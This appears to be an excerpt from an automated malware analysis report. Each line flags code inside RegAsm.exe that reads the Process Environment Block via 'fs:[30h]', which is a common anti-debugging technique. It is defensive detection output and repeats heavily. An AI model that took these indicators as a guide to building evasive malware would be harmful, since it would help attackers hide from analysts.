                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB62A0 mov eax, dword ptr fs:[00000030h]5_2_02BB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB62A0 mov eax, dword ptr fs:[00000030h]5_2_02BB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB62A0 mov eax, dword ptr fs:[00000030h]5_2_02BB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB62A0 mov eax, dword ptr fs:[00000030h]5_2_02BB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5329E mov eax, dword ptr fs:[00000030h]5_2_02B5329E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5329E mov eax, dword ptr fs:[00000030h]5_2_02B5329E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5E284 mov eax, dword ptr fs:[00000030h]5_2_02B5E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5E284 mov eax, dword ptr fs:[00000030h]5_2_02B5E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA0283 mov eax, dword ptr fs:[00000030h]5_2_02BA0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA0283 mov eax, dword ptr fs:[00000030h]5_2_02BA0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA0283 mov eax, dword ptr fs:[00000030h]5_2_02BA0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF5283 mov eax, dword ptr fs:[00000030h]5_2_02BF5283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDF2F8 mov eax, dword ptr fs:[00000030h]5_2_02BDF2F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B192FF mov eax, dword ptr fs:[00000030h]5_2_02B192FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED mov eax, dword ptr fs:[00000030h]5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B302E1 mov eax, dword ptr fs:[00000030h]5_2_02B302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B302E1 mov eax, dword ptr fs:[00000030h]5_2_02B302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B302E1 mov eax, dword ptr fs:[00000030h]5_2_02B302E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF52E2 mov eax, dword ptr fs:[00000030h]5_2_02BF52E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B2D3 mov eax, dword ptr fs:[00000030h]5_2_02B1B2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B2D3 mov eax, dword ptr fs:[00000030h]5_2_02B1B2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B2D3 mov eax, dword ptr fs:[00000030h]5_2_02B1B2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4F2D0 mov eax, dword ptr fs:[00000030h]5_2_02B4F2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4F2D0 mov eax, dword ptr fs:[00000030h]5_2_02B4F2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A2C3 mov eax, dword ptr fs:[00000030h]5_2_02B2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A2C3 mov eax, dword ptr fs:[00000030h]5_2_02B2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A2C3 mov eax, dword ptr fs:[00000030h]5_2_02B2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A2C3 mov eax, dword ptr fs:[00000030h]5_2_02B2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A2C3 mov eax, dword ptr fs:[00000030h]5_2_02B2A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C0 mov eax, dword ptr fs:[00000030h]5_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B292C5 mov eax, dword ptr fs:[00000030h]5_2_02B292C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B292C5 mov eax, dword ptr fs:[00000030h]5_2_02B292C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1823B mov eax, dword ptr fs:[00000030h]5_2_02B1823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF5227 mov eax, dword ptr fs:[00000030h]5_2_02BF5227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B57208 mov eax, dword ptr fs:[00000030h]5_2_02B57208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B57208 mov eax, dword ptr fs:[00000030h]5_2_02B57208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B49274 mov eax, dword ptr fs:[00000030h]5_2_02B49274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B61270 mov eax, dword ptr fs:[00000030h]5_2_02B61270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B61270 mov eax, dword ptr fs:[00000030h]5_2_02B61270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0274 mov eax, dword ptr fs:[00000030h]5_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B24260 mov eax, dword ptr fs:[00000030h]5_2_02B24260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B24260 mov eax, dword ptr fs:[00000030h]5_2_02B24260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B24260 mov eax, dword ptr fs:[00000030h]5_2_02B24260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BED26B mov eax, dword ptr fs:[00000030h]5_2_02BED26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BED26B mov eax, dword ptr fs:[00000030h]5_2_02BED26B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1826B mov eax, dword ptr fs:[00000030h]5_2_02B1826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1A250 mov eax, dword ptr fs:[00000030h]5_2_02B1A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDB256 mov eax, dword ptr fs:[00000030h]5_2_02BDB256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDB256 mov eax, dword ptr fs:[00000030h]5_2_02BDB256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B26259 mov eax, dword ptr fs:[00000030h]5_2_02B26259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19240 mov eax, dword ptr fs:[00000030h]5_2_02B19240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19240 mov eax, dword ptr fs:[00000030h]5_2_02B19240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5724D mov eax, dword ptr fs:[00000030h]5_2_02B5724D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B433A5 mov eax, dword ptr fs:[00000030h]5_2_02B433A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B533A0 mov eax, dword ptr fs:[00000030h]5_2_02B533A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B533A0 mov eax, dword ptr fs:[00000030h]5_2_02B533A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF539D mov eax, dword ptr fs:[00000030h]5_2_02BF539D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B18397 mov eax, dword ptr fs:[00000030h]5_2_02B18397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B18397 mov eax, dword ptr fs:[00000030h]5_2_02B18397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B18397 mov eax, dword ptr fs:[00000030h]5_2_02B18397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B7739A mov eax, dword ptr fs:[00000030h]5_2_02B7739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B7739A mov eax, dword ptr fs:[00000030h]5_2_02B7739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1E388 mov eax, dword ptr fs:[00000030h]5_2_02B1E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1E388 mov eax, dword ptr fs:[00000030h]5_2_02B1E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1E388 mov eax, dword ptr fs:[00000030h]5_2_02B1E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4438F mov eax, dword ptr fs:[00000030h]5_2_02B4438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4438F mov eax, dword ptr fs:[00000030h]5_2_02B4438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF53FC mov eax, dword ptr fs:[00000030h]5_2_02BF53FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E3F0 mov eax, dword ptr fs:[00000030h]5_2_02B3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E3F0 mov eax, dword ptr fs:[00000030h]5_2_02B3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E3F0 mov eax, dword ptr fs:[00000030h]5_2_02B3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B563FF mov eax, dword ptr fs:[00000030h]5_2_02B563FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B303E9 mov eax, dword ptr fs:[00000030h]5_2_02B303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDF3E6 mov eax, dword ptr fs:[00000030h]5_2_02BDF3E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDB3D0 mov ecx, dword ptr fs:[00000030h]5_2_02BDB3D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDC3CD mov eax, dword ptr fs:[00000030h]5_2_02BDC3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A3C0 mov eax, dword ptr fs:[00000030h]5_2_02B2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A3C0 mov eax, dword ptr fs:[00000030h]5_2_02B2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A3C0 mov eax, dword ptr fs:[00000030h]5_2_02B2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A3C0 mov eax, dword ptr fs:[00000030h]5_2_02B2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A3C0 mov eax, dword ptr fs:[00000030h]5_2_02B2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2A3C0 mov eax, dword ptr fs:[00000030h]5_2_02B2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B283C0 mov eax, dword ptr fs:[00000030h]5_2_02B283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B283C0 mov eax, dword ptr fs:[00000030h]5_2_02B283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B283C0 mov eax, dword ptr fs:[00000030h]5_2_02B283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B283C0 mov eax, dword ptr fs:[00000030h]5_2_02B283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA63C0 mov eax, dword ptr fs:[00000030h]5_2_02BA63C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B17330 mov eax, dword ptr fs:[00000030h]5_2_02B17330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE132D mov eax, dword ptr fs:[00000030h]5_2_02BE132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE132D mov eax, dword ptr fs:[00000030h]5_2_02BE132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4F32A mov eax, dword ptr fs:[00000030h]5_2_02B4F32A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1C310 mov ecx, dword ptr fs:[00000030h]5_2_02B1C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B40310 mov ecx, dword ptr fs:[00000030h]5_2_02B40310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA930B mov eax, dword ptr fs:[00000030h]5_2_02BA930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA930B mov eax, dword ptr fs:[00000030h]5_2_02BA930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA930B mov eax, dword ptr fs:[00000030h]5_2_02BA930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5A30B mov eax, dword ptr fs:[00000030h]5_2_02B5A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5A30B mov eax, dword ptr fs:[00000030h]5_2_02B5A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5A30B mov eax, dword ptr fs:[00000030h]5_2_02B5A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BC437C mov eax, dword ptr fs:[00000030h]5_2_02BC437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B27370 mov eax, dword ptr fs:[00000030h]5_2_02B27370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B27370 mov eax, dword ptr fs:[00000030h]5_2_02B27370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B27370 mov eax, dword ptr fs:[00000030h]5_2_02B27370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDF367 mov eax, dword ptr fs:[00000030h]5_2_02BDF367
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19353 mov eax, dword ptr fs:[00000030h]5_2_02B19353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19353 mov eax, dword ptr fs:[00000030h]5_2_02B19353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA035C mov eax, dword ptr fs:[00000030h]5_2_02BA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA035C mov eax, dword ptr fs:[00000030h]5_2_02BA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA035C mov eax, dword ptr fs:[00000030h]5_2_02BA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA035C mov ecx, dword ptr fs:[00000030h]5_2_02BA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA035C mov eax, dword ptr fs:[00000030h]5_2_02BA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA035C mov eax, dword ptr fs:[00000030h]5_2_02BA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEA352 mov eax, dword ptr fs:[00000030h]5_2_02BEA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA2349 mov eax, dword ptr fs:[00000030h]5_2_02BA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1D34C mov eax, dword ptr fs:[00000030h]5_2_02B1D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1D34C mov eax, dword ptr fs:[00000030h]5_2_02B1D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF5341 mov eax, dword ptr fs:[00000030h]5_2_02BF5341
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE60B8 mov eax, dword ptr fs:[00000030h]5_2_02BE60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE60B8 mov ecx, dword ptr fs:[00000030h]5_2_02BE60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB80A8 mov eax, dword ptr fs:[00000030h]5_2_02BB80A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B25096 mov eax, dword ptr fs:[00000030h]5_2_02B25096
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4D090 mov eax, dword ptr fs:[00000030h]5_2_02B4D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4D090 mov eax, dword ptr fs:[00000030h]5_2_02B4D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5909C mov eax, dword ptr fs:[00000030h]5_2_02B5909C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2208A mov eax, dword ptr fs:[00000030h]5_2_02B2208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1D08D mov eax, dword ptr fs:[00000030h]5_2_02B1D08D
